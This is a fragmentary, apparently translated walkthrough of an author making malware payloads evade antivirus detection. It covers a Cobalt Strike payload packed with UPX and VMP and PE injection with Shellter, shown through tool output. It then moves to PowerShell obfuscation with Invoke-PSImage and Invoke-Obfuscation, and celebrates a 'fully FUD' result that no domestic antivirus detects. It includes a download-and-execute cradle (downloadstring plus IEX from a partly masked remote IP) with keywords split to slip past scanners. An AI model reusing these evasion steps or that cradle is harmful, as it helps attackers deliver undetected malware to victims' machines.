2: Wrap it with another language such as Python, Go, or Easy Language (易语言). (Slightly worse compatibility; rejected.)
4: Use an obscure remote-control tool (向日葵 / Sunflower).
5: PowerShell (that's the one).
metasploit framework
Invoke-obfuscation
kali-wslinux
invoke-psimage
Virustotal
Double-click cs.bat, fill in the server details and connect.
Create a new listener and generate a payload (artifact.exe).
Then upload it straight to VT.
Flagged on the spot.
TYPE 1
┌──(root㉿A0L9E8X7-workstation)-[/mnt/c/Users/HP/Desktop]
UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020
After testing, it is still detected.
Now try swapping the packer for VMP.
Great progress, but that is as far as it goes (possibly because the VMP version is old and had no effect).
TYPE 2
Try injection-based evasion (representative tools: Shellter, Backdoor Factory).
Detection rate of the original file
Injecting with Shellter:
www.ShellterProject.com
PE Target: C:\Users\HP\Desktop\DaLiuRen.exe
**********
* Backup *
**********
Backup: Shellter_Backups\DaLiuRen.exe
********************************
* PE Compatibility Information *
********************************
Note: It refers to the minimum required Windows version for the target
******************
* Packed PE Info *
******************
Status: Possibly Not Packed - The EntryPoint is located in the first section!
***********************
* PE Info Elimination *
***********************
Number of Instructions: 10
****************
* Tracing Mode *
****************
Status: Tracing has started! Press CTRL+C to interrupt tracing at any time.
1. PEB.BeingDebugged
2. PEB.NtGlobalFlag
40145c jmp 0040146Eh <0>
Make sure that the file exists and that is not used by another process.
************
* Payloads *
************
[7] WinExec
exist at the right moment during the execution of the infected PE file.
******************
* Encoding Stage *
******************
Please wait...
Binding: Done!
******************
* Encoding Stage *
******************
Please wait...
Binding: Done!
Fetching IAT Pointers to Memory Manipulation APIs...
****************
* Payload Info *
****************
Payload: C:\Users\HP\Desktop\aaaaaaaaaaaaaaaaaaaaaaaa.exe
Reflective Loader: NO
Status: Binding the IAT Handler with Thread Context Aware Polymorphic code.
Please wait...
Type: Engine
Please wait...
Total Entries: 2
Total Entries: 2
*******************
* Injection Stage *
*******************
Section: .text
Done!
Done!
Injection Completed!
*******************
* PE Checksum Fix *
*******************
**********************
* Verification Stage *
**********************
payload.
Warning!
Injection: Verified!
Uploaded it to VT for a scan, and then VT died.
Switched to VirScan and scanned again:
Perfect: not a single domestic AV detected it.
Static evasion does not mean real evasion; it still depends on the actual situation. Keep sensitive operations to a minimum to avoid behavioral detection.
This is about as far as I can go on the EXE side...
Advantages of PowerShell: fileless, simple, practical, and many evasion techniques.
This program comes with ABSOLUTELY NO WARRANTY; for details type show w'.
[+] Done!
PS C:\Users\HP\Desktop>
First download Invoke-PSImage locally.
PS E:\recovery\Desktop\tools\crypt3r5>
nice!
Fully FUD, but no rush; we still need to check whether the run command itself evades detection.
Try Invoke-Obfuscation instead.
Tool :: Invoke-Obfuscation
Twitter :: @danielhbohannon
Blog :: http://danielbohannon.com
Github :: https://github.com/danielbohannon/Invoke-Obfuscation
Version :: 1.8
[*] LAUNCHER Obfuscate command args w/Launcher techniques (run once at end)
C:\Users\HP\Desktop\banana.ps1
[*] LAUNCHER Obfuscate command args w/Launcher techniques (run once at end)
Invoke-Obfuscation> encoding
Invoke-Obfuscation\Encoding> 5
Executed:
CLI: Encoding\5
Result:
Invoke-Obfuscation\Encoding> 7
Executed:
CLI: Encoding\7
Result:
Now it is fully working; it gets onto the machine without a sound.
For the former, use string concatenation to split the keywords in the command (e.g. http, IEX). After concatenation it becomes:
downloadstring(''ht';$b='tp://109.xx.xx.xx/a''))';IEX ($a+$b)")
已复制 1 个文件。
C:\Users\HP>backs.ps1.exe
Windows PowerShell
PS C:\Users\HP> cd
NICE!
Concatenation with very long $-variable commands is also worth trying:
Thanks to the teacher and classmates for reading.